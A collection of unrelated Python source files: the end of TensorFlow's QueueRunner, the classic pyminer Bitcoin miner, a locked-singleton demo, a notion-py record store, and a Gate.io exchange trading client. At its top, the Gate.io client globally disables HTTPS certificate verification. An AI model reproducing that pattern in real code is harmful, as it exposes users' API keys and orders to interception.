def enqueue_ops(self):
return self._enqueue_ops
@property
def close_op(self):
return self._close_op
@property
def cancel_op(self):
return self._cancel_op
@property
def queue_closed_exception_types(self):
return self._queue_closed_exception_types
@property
def exceptions_raised(self):
"""Exceptions raised but not handled by the `QueueRunner` threads.
Exceptions raised in queue runner threads are handled in one of two ways
depending on whether or not a `Coordinator` was passed to
`create_threads()`:
* With a `Coordinator`, exceptions are reported to the coordinator and
forgotten by the `QueueRunner`.
* Without a `Coordinator`, exceptions are captured by the `QueueRunner` and
made available in this `exceptions_raised` property.
Returns:
A list of Python `Exception` objects. The list is empty if no exception
was captured. (No exceptions are captured when using a Coordinator.)
"""
return self._exceptions_raised
@property
def name(self):
"""The string name of the underlying Queue."""
return self._queue.name
# pylint: disable=broad-except
def _run(self, sess, enqueue_op, coord=None):
"""Execute the enqueue op in a loop, close the queue in case of error.
Args:
sess: A Session.
enqueue_op: The Operation to run.
coord: Optional Coordinator object for reporting errors and checking
for stop conditions.
"""
if coord:
coord.register_thread(threading.current_thread())
decremented = False
try:
while True:
if coord and coord.should_stop():
break
try:
sess.run(enqueue_op)
except self._queue_closed_exception_types: # pylint: disable=catching-non-exception
# This exception indicates that a queue was closed.
with self._lock:
self._runs -= 1
decremented = True
if self._runs == 0:
try:
sess.run(self._close_op)
except Exception as e:
# Intentionally ignore errors from close_op.
logging.vlog(1, "Ignored exception: %s", str(e))
return
except Exception as e:
# This catches all other exceptions.
if coord:
coord.request_stop(e)
else:
logging.error("Exception in QueueRunner: %s", str(e))
with self._lock:
self._exceptions_raised.append(e)
raise
finally:
# Make sure we account for all terminations: normal or errors.
if not decremented:
with self._lock:
self._runs -= 1
def _close_on_stop(self, sess, cancel_op, coord):
"""Close the queue when the Coordinator requests stop.
Args:
sess: A Session.
cancel_op: The Operation to run.
coord: Coordinator.
"""
coord.register_thread(threading.current_thread())
coord.wait_for_stop()
try:
sess.run(cancel_op)
except Exception as e:
# Intentionally ignore errors from cancel_op.
logging.vlog(1, "Ignored exception: %s", str(e))
# pylint: enable=broad-except
def create_threads(self, sess, coord=None, daemon=False, start=False):
"""Create threads to run the enqueue ops.
This method requires a session in which the graph was launched. It creates
a list of threads, optionally starting them. There is one thread for each
op passed in `enqueue_ops`.
The `coord` argument is an optional coordinator, that the threads will use
to terminate together and report exceptions. If a coordinator is given,
this method starts an additional thread to close the queue when the
coordinator requests a stop.
This method may be called again as long as all threads from a previous call
have stopped.
Args:
sess: A `Session`.
coord: Optional `Coordinator` object for reporting errors and checking
stop conditions.
daemon: Boolean. If `True` make the threads daemon threads.
start: Boolean. If `True` starts the threads. If `False` the
caller must call the `start()` method of the returned threads.
Returns:
A list of threads.
Raises:
RuntimeError: If threads from a previous call to `create_threads()` are
still running.
"""
with self._lock:
if self._runs > 0:
# Already started: no new threads to return.
return []
self._runs = len(self._enqueue_ops)
self._exceptions_raised = []
ret_threads = [threading.Thread(target=self._run, args=(sess, op, coord))
for op in self._enqueue_ops]
if coord:
ret_threads.append(threading.Thread(target=self._close_on_stop,
args=(sess, self._cancel_op, coord)))
for t in ret_threads:
if daemon:
t.daemon = True
if start:
t.start()
return ret_threads
def to_proto(self, export_scope=None):
"""Converts this `QueueRunner` to a `QueueRunnerDef` protocol buffer.
Args:
export_scope: Optional `string`. Name scope to remove.
Returns:
A `QueueRunnerDef` protocol buffer, or `None` if the `Variable` is not in
the specified name scope.
"""
if (export_scope is None or
self.queue.name.startswith(export_scope)):
queue_runner_def = queue_runner_pb2.QueueRunnerDef()
queue_runner_def.queue_name = ops.strip_name_scope(
self.queue.name, export_scope)
for enqueue_op in self.enqueue_ops:
queue_runner_def.enqueue_op_name.append(
ops.strip_name_scope(enqueue_op.name, export_scope))
queue_runner_def.close_op_name = ops.strip_name_scope(
self.close_op.name, export_scope)
queue_runner_def.cancel_op_name = ops.strip_name_scope(
self.cancel_op.name, export_scope)
queue_runner_def.queue_closed_exception_types.extend([
errors.error_code_from_exception_type(cls)
for cls in self._queue_closed_exception_types])
return queue_runner_def
else:
return None
@staticmethod
def from_proto(queue_runner_def, import_scope=None):
"""Returns a `QueueRunner` object created from `queue_runner_def`."""
return QueueRunner(queue_runner_def=queue_runner_def,
import_scope=import_scope)
def add_queue_runner(qr, collection=ops.GraphKeys.QUEUE_RUNNERS):
"""Adds a `QueueRunner` to a collection in the graph.
When building a complex model that uses many queues it is often difficult to
gather all the queue runners that need to be run. This convenience function
allows you to add a queue runner to a well known collection in the graph.
The companion method `start_queue_runners()` can be used to start threads for
all the collected queue runners.
Args:
qr: A `QueueRunner`.
collection: A `GraphKey` specifying the graph collection to add
the queue runner to. Defaults to `GraphKeys.QUEUE_RUNNERS`.
"""
ops.add_to_collection(collection, qr)
def start_queue_runners(sess=None, coord=None, daemon=True, start=True,
collection=ops.GraphKeys.QUEUE_RUNNERS):
"""Starts all queue runners collected in the graph.
This is a companion method to `add_queue_runner()`. It just starts
threads for all queue runners collected in the graph. It returns
the list of all threads.
Args:
sess: `Session` used to run the queue ops. Defaults to the
default session.
coord: Optional `Coordinator` for coordinating the started threads.
daemon: Whether the threads should be marked as `daemons`, meaning
they don't block program exit.
start: Set to `False` to only create the threads, not start them.
collection: A `GraphKey` specifying the graph collection to
get the queue runners from. Defaults to `GraphKeys.QUEUE_RUNNERS`.
Returns:
A list of threads.
"""
if sess is None:
sess = ops.get_default_session()
if not sess:
raise ValueError("Cannot start queue runners: No default session is "
"registered. Use `with sess.as_default()` or pass an "
"explicit session to tf.start_queue_runners(sess=sess)")
with sess.graph.as_default():
threads = []
for qr in ops.get_collection(collection):
threads.extend(qr.create_threads(sess, coord=coord, daemon=daemon,
start=start))
return threads
ops.register_proto_function(ops.GraphKeys.QUEUE_RUNNERS,
proto_type=queue_runner_pb2.QueueRunnerDef,
to_proto=QueueRunner.to_proto,
from_proto=QueueRunner.from_proto)
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 2014
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
mysingleton2_with_lock.py
|
#!usr/bin/python
# -*- coding:utf8 -*-
# 加上锁
import time
import threading
class Singleton(object):
_instance_lock = threading.Lock()
def __init__(self):
time.sleep(1)
print(self)
def __new__(cls, *args, **kwargs):
with cls._instance_lock:
if not hasattr(cls, '_instance'):
cls._instance = super(Singleton, cls).__new__(cls)
return cls._instance
def task():
obj = Singleton()
print(id(obj))
for i in range(10):
t = threading.Thread(target=task)
t.start()
|
store.py
|
import datetime
import json
import threading
import uuid
from collections import defaultdict
from copy import deepcopy
from dictdiffer import diff
from inspect import signature
from threading import Lock
from pathlib import Path
from tzlocal import get_localzone
from .logger import logger
from .settings import CACHE_DIR
from .utils import extract_id
class MissingClass(object):
def __bool__(self):
return False
Missing = MissingClass()
class Callback(object):
def __init__(
self, callback, record, callback_id=None, extra_kwargs={}, watch_children=True
):
self.callback = callback
self.record = record
self.callback_id = callback_id or str(uuid.uuid4())
self.extra_kwargs = extra_kwargs
def __call__(self, difference, old_val, new_val):
kwargs = {}
kwargs.update(self.extra_kwargs)
kwargs["record"] = self.record
kwargs["callback_id"] = self.callback_id
kwargs["difference"] = difference
kwargs["changes"] = self.record._convert_diff_to_changelist(
difference, old_val, new_val
)
logger.debug("Firing callback {} with kwargs: {}".format(self.callback, kwargs))
# trim down the parameters we'll be passing, to include only those the callback will accept
params = signature(self.callback).parameters
if not any(["**" in str(param) for param in params.values()]):
# there's no "**kwargs" in the callback signature, so remove any unaccepted params
for arg in list(kwargs.keys()):
if arg not in params:
del kwargs[arg]
# perform the callback, gracefully handling any exceptions
try:
# trigger the callback within its own thread, so it won't block others if it's long-running
threading.Thread(target=self.callback, kwargs=kwargs, daemon=True).start()
except Exception as e:
logger.error(
"Error while processing callback for {}: {}".format(
repr(self.record), repr(e)
)
)
def __eq__(self, val):
if isinstance(val, str):
return self.callback_id.startswith(val)
elif isinstance(val, Callback):
return self.callback_id == val.callback_id
else:
return False
class RecordStore(object):
def __init__(self, client, cache_key=None):
self._mutex = Lock()
self._client = client
self._cache_key = cache_key
self._values = defaultdict(lambda: defaultdict(dict))
self._role = defaultdict(lambda: defaultdict(str))
self._collection_row_ids = {}
self._callbacks = defaultdict(lambda: defaultdict(list))
self._records_to_refresh = {}
self._pages_to_refresh = []
with self._mutex:
self._load_cache()
def _get(self, table, id):
return self._values[table].get(id, Missing)
def add_callback(self, record, callback, callback_id=None, extra_kwargs={}):
assert callable(
callback
), "The callback must be a 'callable' object, such as a function."
self.remove_callbacks(record._table, record.id, callback_id)
callback_obj = Callback(
callback, record, callback_id=callback_id, extra_kwargs=extra_kwargs
)
self._callbacks[record._table][record.id].append(callback_obj)
return callback_obj
def remove_callbacks(self, table, id, callback_or_callback_id_prefix=""):
"""
Remove all callbacks for the record specified by `table` and `id` that have a callback_id
starting with the string `callback_or_callback_id_prefix`, or are equal to the provided callback.
"""
if callback_or_callback_id_prefix is None:
return
callbacks = self._callbacks[table][id]
while callback_or_callback_id_prefix in callbacks:
callbacks.remove(callback_or_callback_id_prefix)
def _get_cache_path(self, attribute):
return str(
Path(CACHE_DIR).joinpath("{}{}.json".format(self._cache_key, attribute))
)
def _load_cache(self, attributes=("_values", "_role", "_collection_row_ids")):
if not self._cache_key:
return
for attr in attributes:
try:
with open(self._get_cache_path(attr)) as f:
if attr == "_collection_row_ids":
self._collection_row_ids.update(json.load(f))
else:
for k, v in json.load(f).items():
getattr(self, attr)[k].update(v)
except (FileNotFoundError, ValueError):
pass
def set_collection_rows(self, collection_id, row_ids):
if collection_id in self._collection_row_ids:
old_ids = set(self._collection_row_ids[collection_id])
new_ids = set(row_ids)
added = new_ids - old_ids
removed = old_ids - new_ids
for id in added:
self._trigger_callbacks(
"collection",
collection_id,
[("row_added", "rows", id)],
old_ids,
new_ids,
)
for id in removed:
self._trigger_callbacks(
"collection",
collection_id,
[("row_removed", "rows", id)],
old_ids,
new_ids,
)
self._collection_row_ids[collection_id] = row_ids
self._save_cache("_collection_row_ids")
def get_collection_rows(self, collection_id):
return self._collection_row_ids.get(collection_id, [])
def _save_cache(self, attribute):
if not self._cache_key:
return
with open(self._get_cache_path(attribute), "w") as f:
json.dump(getattr(self, attribute), f)
def _trigger_callbacks(self, table, id, difference, old_val, new_val):
for callback_obj in self._callbacks[table][id]:
callback_obj(difference, old_val, new_val)
def get_role(self, table, id, force_refresh=False):
self.get(table, id, force_refresh=force_refresh)
return self._role[table].get(id, None)
def get(self, table, id, force_refresh=False, limit=100):
id = extract_id(id)
# look up the record in the current local dataset
result = self._get(table, id)
# if it's not found, try refreshing the record from the server
if result is Missing or force_refresh:
if table == "block":
self.call_load_page_chunk(id,limit=limit)
else:
self.call_get_record_values(**{table: id})
result = self._get(table, id)
return result if result is not Missing else None
def _update_record(self, table, id, value=None, role=None):
callback_queue = []
with self._mutex:
if role:
logger.debug("Updating 'role' for {}/{} to {}".format(table, id, role))
self._role[table][id] = role
self._save_cache("_role")
if value:
logger.debug(
"Updating 'value' for {}/{} to {}".format(table, id, value)
)
old_val = self._values[table][id]
difference = list(
diff(
old_val,
value,
ignore=["version", "last_edited_time", "last_edited_by"],
expand=True,
)
)
self._values[table][id] = value
self._save_cache("_values")
if old_val and difference:
logger.debug("Value changed! Difference: {}".format(difference))
callback_queue.append((table, id, difference, old_val, value))
# run callbacks outside the mutex to avoid lockups
for cb in callback_queue:
self._trigger_callbacks(*cb)
def call_get_record_values(self, **kwargs):
"""
Call the server's getRecordValues endpoint to update the local record store. The keyword arguments map
table names into lists of (or singular) record IDs to load for that table. Use True to refresh all known
records for that table.
"""
requestlist = []
for table, ids in kwargs.items():
# ensure "ids" is a proper list
if ids is True:
ids = list(self._values.get(table, {}).keys())
if isinstance(ids, str):
ids = [ids]
# if we're in a transaction, add the requested IDs to a queue to refresh when the transaction completes
if self._client.in_transaction():
self._records_to_refresh[table] = list(
set(self._records_to_refresh.get(table, []) + ids)
)
continue
requestlist += [{"table": table, "id": extract_id(id)} for id in ids]
if requestlist:
logger.debug(
"Calling 'getRecordValues' endpoint for requests: {}".format(
requestlist
)
)
results = self._client.post(
"getRecordValues", {"requests": requestlist}
).json()["results"]
for request, result in zip(requestlist, results):
self._update_record(
request["table"],
request["id"],
value=result.get("value"),
role=result.get("role"),
)
def get_current_version(self, table, id):
values = self._get(table, id)
if values and "version" in values:
return values["version"]
else:
return -1
def call_load_page_chunk(self, page_id, limit=100):
if self._client.in_transaction():
self._pages_to_refresh.append(page_id)
return
data = {
"pageId": page_id,
"limit": limit,
"cursor": {"stack": []},
"chunkNumber": 0,
"verticalColumns": False,
}
recordmap = self._client.post("loadPageChunk", data).json()["recordMap"]
self.store_recordmap(recordmap)
def store_recordmap(self, recordmap):
for table, records in recordmap.items():
if not isinstance(records, dict):
continue
for id, record in records.items():
if not isinstance(record, dict):
continue
self._update_record(
table, id, value=record.get("value"), role=record.get("role")
)
def call_query_collection(
self,
collection_id,
collection_view_id,
search="",
type="table",
aggregate=[],
aggregations=[],
sort=[],
calendar_by="",
group_by="",
limit=50
):
assert not (
aggregate and aggregations
), "Use only one of `aggregate` or `aggregations` (old vs new format)"
# convert singletons into lists if needed
if isinstance(aggregate, dict):
aggregate = [aggregate]
if isinstance(sort, dict):
sort = [sort]
data = {
"collection": {
"id": collection_id,
"spaceId": self._client.current_space.id
},
"collectionView": {
"id": collection_view_id,
"spaceId": self._client.current_space.id
},
"loader": {
'reducers': {
'collection_group_results': {
'limit': limit,
'type': 'results',
},
},
"searchQuery": search,
'sort': sort,
"userTimeZone": str(get_localzone()),
"type": 'reducer',
},
}
response = self._client.post("queryCollection", data).json()
self.store_recordmap(response["recordMap"])
return response["result"]
def handle_post_transaction_refreshing(self):
for block_id in self._pages_to_refresh:
self.call_load_page_chunk(block_id)
self._pages_to_refresh = []
self.call_get_record_values(**self._records_to_refresh)
self._records_to_refresh = {}
def run_local_operations(self, operations):
"""
Called to simulate the results of running the operations on the server, to keep the record store in sync
even when we haven't completed a refresh (or we did a refresh but the database hadn't actually updated yet...)
"""
for operation in operations:
self.run_local_operation(**operation)
def run_local_operation(self, table, id, path, command, args):
with self._mutex:
path = deepcopy(path)
new_val = deepcopy(self._values[table][id])
ref = new_val
# loop and descend down the path until it's consumed, or if we're doing a "set", there's one key left
while (len(path) > 1) or (path and command != "set"):
comp = path.pop(0)
if comp not in ref:
ref[comp] = [] if "list" in command else {}
ref = ref[comp]
if command == "update":
assert isinstance(ref, dict)
ref.update(args)
elif command == "set":
assert isinstance(ref, dict)
if path:
ref[path[0]] = args
else:
# this is the case of "setting the top level" (i.e. creating a record)
ref.clear()
ref.update(args)
elif command == "listAfter":
assert isinstance(ref, list)
if "after" in args:
ref.insert(ref.index(args["after"]) + 1, args["id"])
else:
ref.append(args["id"])
elif command == "listBefore":
assert isinstance(ref, list)
if "before" in args:
ref.insert(ref.index(args["before"]), args["id"])
else:
ref.insert(0, args["id"])
elif command == "listRemove":
try:
ref.remove(args["id"])
except ValueError:
pass
self._update_record(table, id, value=new_val)
|
vngate.py
|
# encoding: utf-8
import urllib
import sys
import json
from time import time, sleep
from threading import Thread
import urllib.parse as urlparse
from datetime import datetime
import base64
import hmac
import hashlib
import json
import gzip, binascii, os
import http.client as httplib
import traceback
import ssl
from vnpy.trader.vtFunction import systemSymbolToVnSymbol , VnSymbolToSystemSymbol
import json
# 取消https的证书验证
try:
_create_unverified_https_context = ssl._create_unverified_context()
except AttributeError:
# Legacy Python that doesn't verify HTTPS certificates by default
pass
else:
# Handle target environment that doesn't support HTTPS verification
ssl._create_default_https_context = _create_unverified_https_context
API_QUERY_URL = 'data.gate.io'
API_TRADE_URL = 'api.gate.io'
FUNCTIONCODE_GET_SYMBOS_GATE = "pairs"
FUNCTIONCODE_GET_MARKETINFO_GATE = "marketinfo" # 市场订单参数
FUNCTIONCODE_GET_MARKETLIST_GATE = "marketlist" # 市场详细行情
FUNCTIONCODE_POST_BALANCE_GATE = "balances"
FUNCTIONCODE_POST_BUY_GATE = "buy"
FUNCTIONCODE_POST_SELL_GATE = "sell"
FUNCTIONCODE_POST_CANCEL_ORDERS_GATE = "cancelOrder"
FUNCTIONCODE_POST_ORDER_INFO_GATE = "getOrder"
FUNCTIONCODE_POST_ORDER_LIST_GATE = "openOrders"
FUNCTIONCODE_POST_HISTORY_TRADE = "tradeHistory"
'''
通过 TradeApi完成
'''
class Gate_TradeApi(object):
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.accessKey = ''
self.secretKey = ''
self.active = False # API工作状态
self.reqID = 0 # 请求编号
#self.reqQueue = Queue() # 请求队列
self.reqQueue = [] # 请求的队列
self.reqThread = Thread(target=self.processQueue) # 请求处理线程
self.account_id = None
#----------------------------------------------------------------------
def processRequest(self, req):
"""处理请求"""
# 读取方法和参数
try:
url = req['url']
method = req['method']
kwargs = req['kwargs']
resource = req["resource"]
data = None
if method in [FUNCTIONCODE_GET_SYMBOS_GATE , FUNCTIONCODE_GET_MARKETINFO_GATE]:
data = self.httpGet( url, resource, '')
elif method in [FUNCTIONCODE_POST_BALANCE_GATE , FUNCTIONCODE_POST_BUY_GATE , FUNCTIONCODE_POST_SELL_GATE , FUNCTIONCODE_POST_CANCEL_ORDERS_GATE , FUNCTIONCODE_POST_HISTORY_TRADE , FUNCTIONCODE_POST_ORDER_INFO_GATE , FUNCTIONCODE_POST_ORDER_LIST_GATE]:
data = self.httpPost( url, resource, kwargs )
# 添加额外信息
if method == FUNCTIONCODE_POST_CANCEL_ORDERS_GATE:
data["systemID"] = kwargs["orderNumber"]
return data
except Exception as ex:
print(u'processRequest Exception:{},{}'.format(str(ex),traceback.format_exc()),file=sys.stderr)
return None
#----------------------------------------------------------------------
def processQueue(self):
"""处理请求队列中的请求"""
while self.active:
try:
if len(self.reqQueue) == 0:
sleep(0.1)
continue
(Type , req) = self.reqQueue[0]
callback = req['callback']
reqID = req['reqID']
try:
data = self.processRequest(req)
# 请求成功
if data != None :
callback(data, req, reqID)
except Exception as ex:
print(u'processQueue1 Exception:{},{}'.format(str(ex), traceback.format_exc()), file=sys.stderr)
self.reqQueue.pop(0)
sleep(0.1)
except Exception as ex:
print(u'processQueue2 Exception:{},{}'.format(str(ex), traceback.format_exc()), file=sys.stderr)
#----------------------------------------------------------------------
def is_same_req(self, req1 , req2):
flag = False
try:
if req1["kwargs"]["orderNumber"] == req2["kwargs"]["orderNumber"]:
return True
except Exception as ex:
print( "Error in is_same_req , req1:{} , req2:{}, ex:{}".format(req1 , req2,str(ex)))
return flag
#----------------------------------------------------------------------
def sendRequest(self, url , resource , method, callback, kwargs = None,optional=None):
"""发送请求"""
# 请求编号加1
self.reqID += 1
# 生成请求字典并放入队列中
req = {}
req['url'] = url
req['resource'] = resource
req['method'] = method
req['callback'] = callback
req['optional'] = optional
req['kwargs'] = kwargs
req['reqID'] = self.reqID
if method in [ FUNCTIONCODE_POST_BALANCE_GATE , FUNCTIONCODE_POST_ORDER_LIST_GATE]:
flag = False
for use_method ,r in self.reqQueue:
if use_method == method:
flag = True
break
if False == flag:
self.reqQueue.append( (method , req))
elif method in [ FUNCTIONCODE_POST_CANCEL_ORDERS_GATE , FUNCTIONCODE_POST_ORDER_INFO_GATE]:
flag = False
for use_method, r in self.reqQueue:
if use_method == method:
if self.is_same_req( r , req) == True:
flag = True
break
if False == flag:
self.reqQueue.append( (method , req))
else:
self.reqQueue.append( (method , req))
#self.reqQueue.put(req)
# 返回请求编号
return self.reqID
#----------------------------------------------------------------------
####################################################
## 主动函数
####################################################
#----------------------------------------------------------------------
def init(self, accessKey, secretKey):
"""初始化"""
self.accessKey = accessKey
self.secretKey = secretKey
self.active = True
self.reqThread.start()
#----------------------------------------------------------------------
def exit(self):
"""退出"""
self.active = False
if self.reqThread.isAlive():
self.reqThread.join()
#----------------------------------------------------------------------
def getSign(self, params, secretKey):
bSecretKey = secretKey.encode(encoding='UTF-8')
sign = ''
for key in params.keys():
value = str(params[key])
sign += key + '=' + value + '&'
sign = sign[:-1]
bSign = sign.encode(encoding='UTF-8')
mySign = hmac.new(bSecretKey, bSign, hashlib.sha512).hexdigest()
return mySign
#----------------------------------------------------------------------
def httpGet(self, url, resource, params=''):
conn = httplib.HTTPSConnection(url, timeout=10)
conn.request("GET", resource + '/' + params)
response = conn.getresponse()
data = response.read().decode('utf-8')
return json.loads(data)
#----------------------------------------------------------------------
def httpPost(self, url, resource, params ):
headers = {
"Accept": "application/json",
'Content-Type': 'application/x-www-form-urlencoded',
"User-Agent": "Chrome/39.0.2171.71",
"KEY":self.accessKey,
"SIGN":self.getSign(params, self.secretKey)
}
conn = httplib.HTTPSConnection(url, timeout=10 )
tempParams = urllib.parse.urlencode(params) if params else ''
conn.request("POST", resource, tempParams, headers)
response = conn.getresponse()
data = response.read().decode('utf-8')
conn.close()
return json.loads(data)
#----------------------------------------------------------------------
def get_symbols(self):
print(u'get_symbols')
return self.sendRequest( API_QUERY_URL , "/api2/1/pairs" , FUNCTIONCODE_GET_SYMBOS_GATE , self.onAllSymbols , kwargs = {} , optional = None)
#----------------------------------------------------------------------
def get_market_info(self):
print(u'get_market_info')
return self.sendRequest( API_QUERY_URL , "/api2/1/marketinfo" , FUNCTIONCODE_GET_MARKETINFO_GATE , self.onMarketInfo , kwargs = {} , optional = None)
#----------------------------------------------------------------------
def get_balance(self):
# print(u'get_balance')
return self.sendRequest( API_TRADE_URL , "/api2/1/private/balances" ,FUNCTIONCODE_POST_BALANCE_GATE , self.onBalances , kwargs = {} , optional = None)
#----------------------------------------------------------------------
def spotBuy(self , symbol, rate, amount):
print(u'spotBuy(self , %s, %s, %s)' % ( symbol, str(rate), str(amount)))
kwargs = {'currencyPair': symbol,'rate':rate, 'amount':amount}
return self.sendRequest( API_TRADE_URL , "/api2/1/private/buy" , FUNCTIONCODE_POST_BUY_GATE , self.onSpotTrade , kwargs = kwargs , optional = None)
#----------------------------------------------------------------------
def spotSell(self , symbol, rate, amount):
print(u'spotSell(self , %s, %s, %s)' % (symbol , str(rate) , str(amount)))
kwargs = {'currencyPair': symbol,'rate':rate, 'amount':amount}
return self.sendRequest( API_TRADE_URL , "/api2/1/private/sell" , FUNCTIONCODE_POST_SELL_GATE , self.onSpotTrade , kwargs = kwargs , optional = None)
#----------------------------------------------------------------------
def spotTrade(self, symbol , amount, _type , price ):
if _type == "buy":
return self.spotBuy( symbol , price , amount )
elif _type == "sell":
return self.spotSell( symbol , price , amount )
else:
return None
#----------------------------------------------------------------------
def cancel_order(self , symbol , order_id):
# print(u'cancel_order(self , %s , %s)' % (symbol , str(order_id)))
kwargs = {"currencyPair" : symbol , "orderNumber" : order_id}
return self.sendRequest( API_TRADE_URL ,"/api2/1/private/cancelOrder" , FUNCTIONCODE_POST_CANCEL_ORDERS_GATE , self.onCancelOrder , kwargs = kwargs , optional = None )
#----------------------------------------------------------------------
def getOrder( self, symbol , order_id ):
# print(u'getOrder( self, %s , %s )' % (symbol , order_id))
kwargs = {"currencyPair" : symbol , "orderNumber" : order_id}
return self.sendRequest( API_TRADE_URL , "/api2/1/private/getOrder" , FUNCTIONCODE_POST_ORDER_INFO_GATE , self.onOrderInfo , kwargs = kwargs , optional = None)
#----------------------------------------------------------------------
def listTradeHistory(self , symbol ):
kwargs = {"currencyPair" : symbol }
return self.sendRequest( API_TRADE_URL , "/api2/1/private/tradeHistory" , FUNCTIONCODE_POST_HISTORY_TRADE , self.onTradeList , kwargs = kwargs , optional = None)
#----------------------------------------------------------------------
def listOpenOrders( self):
# print(u'listOpenOrders( self)')
return self.sendRequest( API_TRADE_URL , "/api2/1/private/openOrders" , FUNCTIONCODE_POST_ORDER_LIST_GATE , self.onOrderList , kwargs = {} , optional = None)
#----------------------------------------------------------------------
def onBalances(self,data, req, reqID):
print(u'onBalances(self, data, req, reqID)')
print(data)
# ----------------------------------------------------------------------
def onAllSymbols(self,data, req, reqID):
print(u'onAllSymbols(self, data, req, reqID)')
print(data)
#----------------------------------------------------------------------
def onMarketInfo(self,data, req, reqID):
print(u'onMarketInfo(self, data, req, reqID)')
print(data)
#----------------------------------------------------------------------
def onSpotTrade(self,data, req, reqID):
print(u'onSpotTrade(self, data, req, reqID)')
print(data)
#----------------------------------------------------------------------
